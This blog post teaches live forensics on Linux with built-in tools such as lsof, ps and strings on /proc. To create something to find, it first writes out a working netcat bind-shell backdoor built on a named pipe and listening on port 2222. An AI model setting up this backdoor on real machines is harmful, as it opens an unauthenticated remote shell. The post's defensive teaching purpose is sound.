In this blog post, I will provide an introduction of how to do live forensics on a Linux machine by using default command line tools. If you wish to do the same on a Windows machine, I have got you covered: Endpoint Live Forensics from the Command Line on Windows. This blog post is heavily inspired by the 16-hour seminar “SOC Core Skills” by John Strand (Black Hills Information Security).
In order to understand the following steps, we need to know that everything on Linux is a file, even processes. Today, we will look into /proc, which is a directory that contains a folder for each running process. Each process has its own directory with virtual files within. Spoiler alert: We are going to analyze one of those files.
Create a backdoor and connect to it
Let’s start by setting up a malicious process on the Linux system. Firstly, we create a backdoor with netcat from a terminal tab and connect back to it from a second tab.
Terminal tab 1:
mknod backpipe p/bin/bash 0<backpipe | nc -l 2222 1>backpipe
The first command creates a file of type device pipe called backpipe, whereas the second one starts a netcat listener on port 2222 that forwards all input through the backpipe and then into a bash session. It then takes the output of the bash session and puts it back into the netcat listener. Wait what? At first, I couldn’t visualize what this command did – yes, vision is strong with this one, so I played with it. The screenshot below visualizes how this backdoor works.
My input, i.e., the command whoami, is rerouted to the input of bash which replies root and kills the listener.
Terminal tab 2:
nc 127.0.0.1 2222
In real life, you would use the IP address of the target machine instead of 127.0.0.1. This works in this situation, because the attacker and the victim machines are one and the same.
Run analysis from the command line with default tools
Now everything is set up for the analysis. We open a third terminal tab, we switch to root, and list all the open connections with lsof -i -P1.
lsof -i -PThis list shows two processes. PID 157 is the process running our backdoor (user: root), whereas PID 158 is the TCP connection to it, that is, the process launched from the second tab we opened (user: adhd). In a real world situation we would only the outbound connection from port 2222, because the inverse connection would be on the attacker’s machine. Next, we investigate PID 157 further by running lsof -p 157.
This command lists all open files associated with this process. We can see that there is a named pipe2 called backpipe in the root folder and netcat is running from the bin directory. This is the first indication that netcat is currently running on the system. We can now go a step further and list the command that initialized these processes by running ps aux3.
The output of this command shows that there is a backdoor running on port 2222. From here, we take the last step and analyze the executable running process 157. We do this with the tool strings4 which confirms our suspicion that netcat was running within PID 157.
cd /proc/157strings ./exe
strings run on exe, we see that netcat is definitely running on PID 157.All in all, we were able to detect a fishy connection, find the PID behind it, list the command that invoked the corresponding process and analyze its executable using Linux built-in tools only.
I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!
lsoflists all the open files.-iselects IPv4 and IPv6 files, that is, the TCP and UDP connections.-Ptells the command not to guess what service is running behind a certain port.- FIFO files are named pipes that are accessed as part of the file system.
- a: List all processes with TTY. u: With user ID or name. x: List processes without controlling TTYs
stringsis a tool that displays printable strings in a file.